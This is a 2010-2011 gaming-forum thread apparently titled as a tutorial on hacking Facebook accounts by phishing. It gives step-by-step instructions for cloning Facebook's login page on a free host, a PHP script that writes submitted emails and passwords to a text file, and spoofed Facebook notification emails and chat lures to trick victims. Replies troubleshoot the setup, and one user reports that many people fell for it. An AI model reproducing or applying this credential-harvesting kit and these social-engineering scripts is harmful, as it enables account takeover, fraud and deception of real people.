Post: Tutorial on howto hack Facebook accounts. (Phishing)
05-07-2010, 08:12 AM #1
lxzer
Do a barrel roll!
(adsbygoogle = window.adsbygoogle || []).push({});
Hack
A


Facebook


Account



Gaining access to ones Facebook account without any prior knowledge to the users password prior to phishing is not as hard as one may pres-eve it to be. Read on and you will learn how to do this.

How will this be done? You will be able to gain acess to another users facebook profile by using a method known as "phishing"

Phishing.

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

Lets get started!

HOW

Sign up on a free webpage hosting site. I prefer You must login or register to view this content. as it is the easiest free hosting site to use (in my opinion) and doesn't remove your webpage once it has been created.

Once you have signed up click on " You must login or register to view this content. "

Now click on " You must login or register to view this content. "

Once you are in your files click on create text file.

You are going to need to name the file " Login.php " (Don't include quotations )

You are now going to visit this site by clicking You must login or register to view this content.

You are going to now view the source of the page and select all of the text, you are going to copy the text.

now go on back to your text file named " login.php " that you made earlier. You are going to paste the text that you copied from Facebook into your text file. Once done, click on "create"

Now go back to " My Files " And create another text file.

You are going to name this file " Phishing.php " (Don't include quotations )

now copy and paste this:

Originally posted by another user
<?php
header ('Location: You must login or register to view this content. 'Winky Winky;
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>


Replace "XXXXXXXXXXXXXXXX" with your ripway username.

Now click on create.

go back to " my files " and your going to want to click on "edit" for your " login.php " file.

Once your editing " login.php " Your going to want to click in the body of the text and hit Ctrl F. This will open up a find function and your going to type in " action " ( without quotations )

It will bring you to something like this:


action="https://login.facebook.com/login.php?login_attempt=1"

your going to want to select everything within the quotations. ( You will select " You must login or register to view this content. " )

Now replace this with:

action="https://h1.ripway.com/XXXXXXXXXXXXXXXX/phishing.php?"

Replace the XXXXXXXXX's with your ripway username.

now click on " save "

Go back to " My Files " and go to where it says:

login.php
Direct Link: You must login or register to view this content.
[ Get HTML Codes | Rename | Edit ]

Copy " You must login or register to view this content. " The XXXX's will be your ripway username.

This is what your link to your webpage is, when you send this to people and they login to it their email and password will be displayed in " passwords.txt "

If at anytime you wish to view the email and password they entered just simply edit " passwords.txt " and bobs your uncle :y:

If for whatever reason this didn't work, then please ask a question on this thread. If this helped you then don't forget to thank or +REP me! Happy

Where I learned this: [ame="https://www.youtube.com/watch?v=0fJOxdDjPn8"]LINK.[/ame]

HOWTO CONVINCE YOUR VICTIM TO LOGIN TO YOUR FAKE WEBPAGE.


There is several ways this may be accomplished but one that almost always works is to email spoof your victim and appear as if your Facebook. I personally like to use " [email][email protected][/email] " as it is the official notification email sender for Facebook.

Simply putting in " You must verify your Facebook account " persons name " failure at verifying your account will result in termination of your account.

Or you could simply put something like:

Bob Smith commented on his status:

"that doesn't make sense"

Reply to this email to comment on this status.

To see the comment thread, follow the link below:
You must login or register to view this content.

Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to: You must login or register to view this content.

This message was intended for private@ private.com. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.
You must login or register to view this content.
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.


There is quiet a few tutorials on email spoofing but for a quick easy way to start email spoofing just use this You must login or register to view this content.

Also just talking over MSN and starting up a convo maybe saying things like:

You say: Hey

Target says: Hey

You say: Whats up?

Target says: Nothing jc, you?

You say: Nothing bored, you know bob was talking shmmmaccck about you right?

Target says: no, what?

You say: Yea its on Facebook he was calling you a silly pelican

Target says: that kid really grinds my gears, where did he post this?

You say: You must login or register to view this content.


And bobs your uncle :y:

Use whatever method works for you or create your own and post them here. Also Sending ripway links or any other phishing links directly over Facebook chat will get you suspended for a day or two, as i was suspended.

Plain and simple, this is as far as I know the only trojan/backdoor/keylogger free way to gain access to someones Facebook account. There is no " Facebook password cracker " Out there that works as far as im aware.

This was my first tutorial I have posted on this site so give me some critique, or if you thought it was a good tutorial or not!

This is pretty simple, but if you have any problems then just let me know!

If this helped you then don't forget to thank or +REP!
(adsbygoogle = window.adsbygoogle || []).push({});

The following 33 users say thank you to lxzer for this useful post:

2RAW4THESTREET, Car Lover, Chewcracka, Classy., Cpt.Hayden, Darknesse13, Docko412, Encopresis, ESQ_Pugh, FAKA_ELITE, FourzerotwoFAILS, free, Goutinator, Joshycc, Matt1511, Mezzid, Mr. Star, Mudkipzzzz, Nejidam, NeverMoreModz, ozzy21, PatheticBowler, Perfekt, Pichu, Pro Era, Samos95, Toon_Squad, Weescotty, wiseguy48, wite_guy, xMagiik
05-13-2011, 02:12 AM #128
I've done this for a while :P thanks for the post
05-16-2011, 01:13 AM #129
Gaia
Former Staff
MOVED ~to Computer Hacking.
05-21-2011, 09:04 AM #130
HEKTIC4LYF
Little One
for those who said it doesnt generate aa passwords thing its cause u added 2 actions= u only copy the bit in between the "
05-21-2011, 09:26 AM #131
*BLizZOnE*
Valo = Voice of a GOD
OMG... lmao cant w8 =D
05-21-2011, 08:41 PM #132
you dont explain how to make 'passwords.txt'. is it the same as the rest? and do you have to link it up in some way? thanks
05-21-2011, 09:01 PM #133
regilex
Do a barrel roll!
Ripway is the worst host for phishers. Don't know why people still use it. People been hosting phishers on that since like 07. They detect em quick now adays
05-22-2011, 12:15 AM #134
HEKTIC4LYF
Little One
Originally posted by jackf094 View Post
you dont explain how to make 'passwords.txt'. is it the same as the rest? and do you have to link it up in some way? thanks


Omg mayb if u looked up at my other post....
The bit where u search action he makes u think u need to add to action= but u only copy the bits in between the " "
06-09-2011, 02:52 AM #135
djh1495
Gotta Love Mods <3
Very nice! Thanks for this!:y:
06-09-2011, 09:46 PM #136
Default Avatar
mhowe
Guest
So, I guess people out there are pretty dumb because I did it (out of boredom) and lots of people fell for it... but I was smart and added a facebook name in the webpage. Anyways, I did do it and it was all fun stuff but I tried it out this morning and it didn't seem to be working anymore. I was curious as to why people stopped falling for it but I don't think that was the case. What happened was it just stopped working altogether. No hacking intended, just wanted to see if it worked and how dumb people really are.

My second question is... it a phishing page for windows live going to work the same way as for facebook? Just curious

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo